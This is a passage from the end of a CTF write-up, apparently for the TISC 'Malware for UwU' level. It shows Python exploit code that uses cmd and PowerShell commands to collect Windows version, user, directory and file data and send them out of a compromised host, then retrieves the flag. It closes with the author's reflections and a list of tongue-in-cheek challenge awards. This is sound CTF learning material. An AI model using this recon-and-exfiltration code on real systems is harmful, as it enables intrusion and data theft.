exfil_working_file()
## MicrosoftWindowsVersion10.0.14393
def get_version():
version_file = 'v'
send_command("cmd /c \"ver > {}\"".format(version_file))
send_command("powershell \"(Get-Content {}).replace(' ', '') | Set-Content {}\"".format(version_file, version_file))
send_command("powershell \"(Get-Content {}).replace('[', '') | Set-Content {}\"".format(version_file, version_file))
send_command("powershell \"(Get-Content {}).replace(']', '') | Set-Content {}\"".format(version_file, version_file))
send_command("powershell \"(Get-Content {})[1] | Set-Content {} -NoNewLine\"".format(version_file, version_file))
send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, version_file))
exfil_working_file()
## ec2amaz-9ri345e\administrator
def get_user():
user_file = 'v'
send_command("cmd /c \"whoami > {}\"".format(user_file))
send_command("powershell \"(Get-Content {}).replace('\\', '') | Set-Content {} -NoNewLine\"".format(user_file, user_file))
send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, user_file))
exfil_working_file()
## C:\Users\Administrator\AppData\LocalLow
def get_pwd():
send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
exfil_working_file()
## Microsoft
## Temp
## 1_run_uwu1.bat
def get_file_name(index):
send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
exfil_working_file()
def exfil_final_uwu():
delete_file("c")
delete_file("x")
delete_file("y")
send_command("cmd /c \"echo ^4 > c\"")
send_command("cmd /c \"echo ^5 >> c\"")
send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
sleep(3) # more time to play UwU sound
send_command("powershell \"Select-String -Path x -Pattern TISC|Out-File y\"") # save more time
exfil_file("y")
if __name__ == "__main__":
delete_file(WORKING_FILE)
# get_user()
# get_pwd()
# get_file_name(2)
# exfil_file('1_run_uwu1.bat')
# exfil_lost_block('e', 120, 30)
# exfil_lost_block('e', 330, 13)
# exfil_lost_block('y', 25, 25)
exfil_final_uwu()
Interestingly, this turned out to be an unintended solution as I was meant to rely purely on the shellcode to transmit the flag via the UwU.exe
messaging functions. I had considered this route earlier but decided that it would be too troublesome to set up the call stack. Fortunately, life found a way.
TISC{UwU_m@lwArez_4_uWuuUU!}
Conclusion
After two weeks of intense puzzle solving, I finished all 10 levels, claiming $25,000 for charity as one other participant had completed level 8. CSIT kindly donated the prize money to The Community Chest on my behalf. I got lots of practice exploiting a broad range of targets and crafted my own ASCII-only Windows WinExec shellcode that could be reused for future exploits. It was a trial by fire that gave me more confidence to tackle new CTF domains such as steganography, forensics, and pwn. Many of the later challenges featured twists that forced me to “try harder” beyond existing writeups and conduct my own original research. If I could award prizes to challenges, they would be:
- Most Hardcore: Malware for UwU
- Best Storyline: 1865 Text Adventure
- Biggest Headache: Get-Shwifty
- Most Dynamic: The Secret
- Biggest Haystack: Knock Knock, Who’s There
- Smallest Needle: Need for Speed
- Smallest Payload: The Magician's Den
- Most Likely to Make Me Guess: Needle in a Greystack
- Most Enraging: Dee Na Saw as a need
- Most Parts: Scratching the Surface
Thank you TISC organising team for a great challenge!